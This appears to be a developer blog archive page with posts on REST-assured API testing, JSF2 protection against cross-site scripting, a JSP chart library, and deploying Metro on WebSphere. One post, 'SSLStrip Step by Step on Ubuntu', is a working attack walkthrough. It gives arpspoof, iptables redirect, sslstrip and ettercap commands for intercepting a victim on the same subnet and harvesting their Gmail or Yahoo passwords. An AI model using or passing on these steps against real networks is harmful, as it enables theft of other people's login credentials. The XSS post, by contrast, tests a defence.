Wednesday, June 08, 2011

REST-assured Tricks: How to test a value in JSON

Use equalTo(). When the value is a string, quote it as a string, e.g. '121'; a bare 121 matches a JSON number.
In the example below, openbalance is a property of useraccount, and useraccount is the name of the enclosing JSON object.
Some implementations do not return the object name; in such cases replace "useraccount.openbalance" with "openbalance".

String result = given().header("accept", "application/json")
        .contentType(ContentType.XML).body(xmlBody)   // xmlBody: the XML request payload (a String declared earlier in the test)
        .expect().body("useraccount.openbalance", equalTo(121),
                       "useraccount.useraccountid", notNullValue())
        .when().post("/RestFullDayTrader/resources/acct").asString();

REST-assured Tricks: How to test for 307 Temporary Redirect?

Testing for a 307 has two parts: a) test the HTTP status code, b) test the HTTP Location header.
// XML payload
String xmlBody = "<orderData><orderType>BUY</orderType><quantity>44</quantity><useraccountid>10</useraccountid></orderData>";
String location = given()
        .contentType(ContentType.XML).body(xmlBody)
        // a) test HTTP status code 307
        .expect().statusCode(307)
        .when()
        .post("/RestFullDayTrader/resources/pending_orders/100").getHeader("Location");
System.out.println(" Location " + location);
// b) test HTTP header Location
assertTrue(location.contains("pending_orders/100"));
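A complete JUnit test that puts the two tricks above together, added here as an example; it is not code from the original post. It assumes the same DayTrader-style resources and XML payload as above, REST-assured 1.x (package com.jayway.restassured; from 2.x on the package is io.restassured) in a version that offers redirects().follow(false), and a hypothetical string field useraccount.currency to show the string form of equalTo().

```java
import static com.jayway.restassured.RestAssured.given;
import static org.hamcrest.Matchers.containsString;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.notNullValue;

import com.jayway.restassured.http.ContentType;
import org.junit.Test;

// Added example, not part of the original post.
public class DayTraderRestAssuredTest {

    // Same XML payload the post sends to the acct and pending_orders resources.
    private static final String ORDER_XML =
            "<orderData><orderType>BUY</orderType><quantity>44</quantity>"
            + "<useraccountid>10</useraccountid></orderData>";

    // Trick 1: assert individual values inside the JSON response with GPath.
    @Test
    public void accountResponseCarriesExpectedValues() {
        given()
                .header("accept", "application/json")
                .contentType(ContentType.XML)
                .body(ORDER_XML)
        .expect()
                .statusCode(200)
                // numeric JSON value: compare against a number
                .body("useraccount.openbalance", equalTo(121))
                // string JSON value: compare against a quoted string
                // (useraccount.currency is a hypothetical field used for illustration)
                .body("useraccount.currency", equalTo("USD"))
                .body("useraccount.useraccountid", notNullValue())
        .when()
                .post("/RestFullDayTrader/resources/acct");
    }

    // Trick 2: assert the 307 itself and its Location header.
    @Test
    public void pendingOrderIsAnsweredWith307AndLocation() {
        given()
                // Do not let the HTTP client follow the redirect: otherwise the
                // assertions would run against the redirect target's response,
                // not against the 307 the service actually sent.
                .redirects().follow(false)
                .contentType(ContentType.XML)
                .body(ORDER_XML)
        .expect()
                // a) status code
                .statusCode(307)
                // b) Location header, checked inside the expectation chain
                .header("Location", containsString("pending_orders/100"))
        .when()
                .post("/RestFullDayTrader/resources/pending_orders/100");
    }
}
```

Checking the Location header with header("Location", containsString(...)) keeps the whole expectation in one chain and gives a REST-assured failure message on mismatch; if the raw value is needed for further checks, post(...).getHeader("Location") still returns it as in the post.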

Tuesday, June 07, 2011

Test code using prettify

public void testReliablePostBuy() throws Exception {
        System.out.println("testReliablePostBuy");
        String xmlBody = "BUY44SYMBOLICIC110";
        //xml
    
How to use prettify with blogger/blogspot?

Tuesday, December 01, 2009

Secure applications with JSF: JSF2 and XSS

Securing web applications with JSF2 is a lot easier. Java EE provides many security features. Let's examine these features in the context of the OWASP Top Ten: actually try to hack the application and analyze the results.

XSS or Cross-Site Scripting: protection against XSS is built in and enabled by default. I have created a sample application using NetBeans. It has a cool code generator for JSF2 CRUD operations.

JSF code to display a field: <h:outputText value="#{item.description}" />

Let's inject an XSS vector from http://ha.ckers.org/xss.html .

Result after injecting JavaScript into the description field:

[Screenshot: ProductListWithEscape]

Note that the JavaScript is displayed in the table as-is; it is not executed. Another screenshot, with IE:

[Screenshot: ProductListWithEscapeIE]

I got a similar result with Chrome.

Modified the JSF not to escape the output, i.e. not to handle XSS: <h:outputText value="#{item.description}" escape="false"/>

Popup in Firefox:

[Screenshot: ProductListWithOutEscapeFF]

Hacked result in FF:

[Screenshot: ProductListWithOutEscapeFF2]

Hacked result in IE:

[Screenshot: ProductListWithOutEscapeIE]

Hacked result in Chrome. Interestingly, Chrome was not able to render the page.

[Screenshot: ProductListWithOutEscapeChrome]

Conclusion: JSF provides XSS protection by default. I will soon present results of more attacks.
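To make the default concrete, here is a stand-alone Java illustration, added to this post and not part of the original, of what the two renderings above differ in. It mimics the HTML encoding JSF's outputText renderer applies when escape is true (the exact entity set is an assumption; JSF implementations differ in the details) and renders the same description with escaping on and off, so the effect of escape="false" can be seen without deploying the application.

```java
// Added illustration (not from the original post): what h:outputText's default
// escape="true" does to untrusted text before it reaches the browser.
public final class OutputTextEscapeDemo {

    // HTML-encode the characters that can end a text node or attribute value.
    // Assumption: JSF's renderer encodes at least these; implementations may encode more.
    static String escapeHtml(String value) {
        StringBuilder sb = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Equivalent of <h:outputText value="#{item.description}" escape="..."/> inside a table cell.
    static String renderCell(String description, boolean escape) {
        return "<td>" + (escape ? escapeHtml(description) : description) + "</td>";
    }

    // True when the rendered cell contains no markup beyond its own <td> wrapper,
    // i.e. the description stayed plain text in the browser's eyes.
    static boolean descriptionStayedText(String renderedCell) {
        String inner = renderedCell.substring("<td>".length(),
                renderedCell.length() - "</td>".length());
        return inner.indexOf('<') < 0 && inner.indexOf('>') < 0;
    }

    public static void main(String[] args) {
        // Constructed sample: a description carrying a script tag, the kind of
        // vector injected into the description field above.
        String description = "<script>alert('xss')</script>";

        String safe = renderCell(description, true);    // default JSF behaviour
        String unsafe = renderCell(description, false); // escape="false"

        System.out.println("escape=true : " + safe + "  text only? " + descriptionStayedText(safe));
        System.out.println("escape=false: " + unsafe + "  text only? " + descriptionStayedText(unsafe));
    }
}
```

The escaped cell reaches the browser as &lt;script&gt;..., which is displayed literally (the first screenshots), while the unescaped cell hands the browser a real script element (the popup). descriptionStayedText is the kind of check a rendering test can apply to a component's output.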

Thursday, September 10, 2009

SSLStrip Step by Step on Ubuntu

SSLStrip is used along with a MITM attack to hack SSL websites.
You will need the following:
  1. SSLStrip
  2. arpspoof
  3. ettercap
  4. Ubuntu Linux
  5. Internet Connection
  6. Victim has to be in the same subnet
Step 1:- Download SSLStrip from http://www.thoughtcrime.org/software/sslstrip/

Step 2:- Unzip the downloaded file: "tar -zxvf sslstrip-0.4.tar.gz"


Step 3:- Build SSLStrip: change directory to the unzipped folder and run "python setup.py build"

Step 4:- Install SSLStrip: run "sudo python setup.py install" (requires root privileges)

Step 5:- Install arpspoof "sudo apt-get install dsniff"

Step 6:- Install ettercap "sudo apt-get install ettercap"


Step 7:- Verify your IP address with "ifconfig". Notice the hacker's IP is 172.168.1.3


Step 8:- Verify your default gateway "ip route show | grep default | awk '{ print $3}' "

Note: This hack works only if the victim's gateway address is the same as the hacker's (172.168.1.1 in the above example).

Step 9:- Create three different tabs in your terminal window. We need to run three commands in parallel. In the first tab run "sudo arpspoof -t 172.168.1.4 172.168.1.1"


Step 10:- In the second tab run "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000"
and then run "sslstrip"


Step 11:- In the third tab run ettercap. Ettercap will print all the passwords it sniffs on the console: "sudo ettercap -Tqz"

Step 12:- Wait for the victim to log in to Gmail, Yahoo etc.; the passwords will be printed on the ettercap console.

Saturday, February 14, 2009

jkookOFCTags Released


jkookOFCTags is a JSP tag library for drawing Flash charts. It is based on the well-known Open Flash Chart project
and extends the Open Flash Chart 2.x library for Java.
It depends on XStream 1.3.1.

Installing metro on WebSphere6.1

Installing Metro on WebSphere 6.1 without installing the feature pack.

Create your web application.
The most important change is to add
com.sun.xml.ws.transport.http.servlet.WSServlet and your web service entries to web.xml and sun-jaxws.xml.

Create the EAR file with this layout (the Metro jars sit at the EAR root, next to the war):

META-INF/
    Application.xml
webmodule.war
    META-INF/
        MANIFEST.MF
webservices-api.jar
webservices-extra.jar
webservices-extra-api.jar
webservices-rt.jar
webservices-tools.jar


Remove the conflicting jars from WEB-INF/lib:
jaxb-api-1.5.jar
jaxb-impl-1.5.jar
jaxb-libs-1.5.jar
jaxb-xjc-1.5.jar
jaxrpc-api-1.1.jar
jaxrpc-impl-1.1.jar
jaxrpc-spi-1.1.jar
xerces-2.0.2.jar
xml-apis-2.0.2.jar


Contents of Application.xml:

<application id="Application_ID1">
    <display-name>MyEnterpriseApplication</display-name>
    <module id="WarModule">
        <web>
            <web-uri>webmodule.war</web-uri>
            <context-root>/metrowebservices</context-root>
        </web>
    </module>
</application>




Add the following line to MANIFEST.MF so the war can see the Metro jars at the EAR root:
Class-Path: webservices-api.jar webservices-extra.jar webservices-extra-api.jar webservices-rt.jar webservices-tools.jar


Finally, in the IBM administration console set the class loader order of the application to:
Classes loaded with application class loader first